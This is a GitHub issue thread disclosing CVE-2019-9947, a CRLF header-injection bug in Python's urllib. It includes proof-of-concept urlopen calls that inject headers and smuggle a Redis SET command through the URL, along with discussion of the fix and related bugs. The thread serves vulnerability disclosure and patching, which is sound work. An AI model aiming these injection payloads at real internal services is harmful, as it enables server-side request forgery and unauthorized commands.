New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
[CVE-2019-9947] Header Injection in urllib #80087
Comments
this patch can also be broken by path and query string. can succeed to inject HTTP header and be more critical by bypassing illegal header check # Vulnerability PoC
>>> urllib.request.urlopen('http://127.0.0.1:1234/?q=HTTP/1.1\r\nHeader: Value\r\nHeader2: \r\n')
or
>>> urllib.request.urlopen('http://127.0.0.1:1234/HTTP/1.1\r\nHeader: Value\r\nHeader2: \r\n')
we can inject headers completely. ## Redis >>> urllib2.urlopen('http://127.0.0.1:6379/?q=HTTP/1.1\r\nSET VULN POC\r\nHeader2:\r\n').read()
'$-1\r\n+OK\r\n-ERR unknown command `Header2:`, with args beginning with: `HTTP/1.1`, \r\n-ERR unknown command `Accept-Encoding:`, with args beginning with: `identity`, \r\n' $ redis-cli
127.0.0.1:6379> GET VULN
"POC" # Root Cause
It could succeed to parse host because of re.DOTALL this version of the commit was 3.4.7+ this vulnerability can be affected 3.4.7+ ~ 3.8-dev <- I tested it. maybe after the commit, all of higher versions can trigger this vulnerability. # Conclusion (Although this vulnerability is old on 12 Jul 2017, I don't know why no one has submitted issue still now XDD) |
Hi all, Not sure for the right way for this fix but here is a PR. I am interested by your feedback. Thank you |
Sorry, I'm late. |
Maybe related to Victor's "Issue 1" described in bpo-32085. That is also a security bug about CRLF in the URL's path, but was opened before bpo-30500 was opened and the code changed, so I'm not sure if it is the same as this or not. Also there is bpo-13359, a proposal to automatically percent-encode invalid URLs. For a security fix, I'm not sure but it might be safer to raise an exception, rather than rewriting the invalid URL to a valid one. |
Yes, I thought so. before the commit version i said, the previous version( |
According to https://bugzilla.redhat.com/show_bug.cgi?id=1695572, the CVE-2019-9947 has been assigned to this issue. |
my fix proposed in bpo-30458 fixes this issue. i do not think this one deserved its own CVE; at least https://nvd.nist.gov/vuln/detail/CVE-2019-9947's current text also points to the other one. |
Note: these values reflect the state of the issue at the time it was migrated and might not reflect the current state.
Show more details
GitHub fields:
bugs.python.org fields:
The text was updated successfully, but these errors were encountered: